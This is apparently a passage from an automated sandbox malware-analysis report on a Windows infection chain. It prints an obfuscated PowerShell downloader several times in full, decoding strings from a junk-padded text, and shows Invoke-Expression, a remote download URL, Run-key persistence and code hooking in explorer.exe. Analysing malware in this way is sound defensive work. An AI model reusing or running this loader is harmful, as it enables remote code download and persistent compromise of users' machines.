A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString,25_2_00C8ACA0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAB780BE8 pushad ; retf 12_2_00007FFAAB780C6D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAB8554BA push ebp; iretd 12_2_00007FFAAB855538
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0474EC78 pushfd ; retf 16_2_0474EC79
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_075C1D28 push eax; mov dword ptr [esp], ecx16_2_075C21B4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_075C21A8 push eax; mov dword ptr [esp], ecx16_2_075C21B4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0826386A pushad ; retf 16_2_08263871
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0826387D pushfd ; retf 16_2_08263881
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0826369D push ebx; iretd 16_2_082636DA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224209AD push ecx; mov dword ptr [esp], ecx20_2_224209B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235EB1E push esp; retn 0000h20_2_2235EB1F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235EB02 push esp; retn 0000h20_2_2235EB03
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235E9B5 push esp; retn 0000h20_2_2235EAE7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239EB1E push esp; retn 0000h20_2_2239EB1F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239EB02 push esp; retn 0000h20_2_2239EB03
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239E9B5 push esp; retn 0000h20_2_2239EAE7
        Source: C:\Windows\explorer.exeCode function: 22_2_093569B5 push esp; retn 0000h22_2_09356AE7
        Source: C:\Windows\explorer.exeCode function: 22_2_09356B1E push esp; retn 0000h22_2_09356B1F
        Source: C:\Windows\explorer.exeCode function: 22_2_09356B02 push esp; retn 0000h22_2_09356B03
        Source: C:\Windows\explorer.exeCode function: 22_2_09AFD9B5 push esp; retn 0000h22_2_09AFDAE7
        Source: C:\Windows\explorer.exeCode function: 22_2_09AFDB02 push esp; retn 0000h22_2_09AFDB03
        Source: C:\Windows\explorer.exeCode function: 22_2_09AFDB1E push esp; retn 0000h22_2_09AFDB1F
        Source: C:\Windows\explorer.exeCode function: 22_2_0B316B1E push esp; retn 0000h22_2_0B316B1F
        Source: C:\Windows\explorer.exeCode function: 22_2_0B316B02 push esp; retn 0000h22_2_0B316B03
        Source: C:\Windows\explorer.exeCode function: 22_2_0B3169B5 push esp; retn 0000h22_2_0B316AE7
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C929BD push ecx; ret 25_2_00C929D0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C9252C push ecx; ret 25_2_00C9253F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044409AD push ecx; mov dword ptr [esp], ecx25_2_044409B6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EC22A push BE707C3Eh; ret 25_2_001EC22F
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EC4B7 push eax; retf 25_2_001EC4B8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001ED4A5 push eax; ret 25_2_001ED4F8
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001ED4FB push eax; ret 25_2_001ED562
        Source: C:\Windows\SysWOW64\raserver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBTJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBTJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
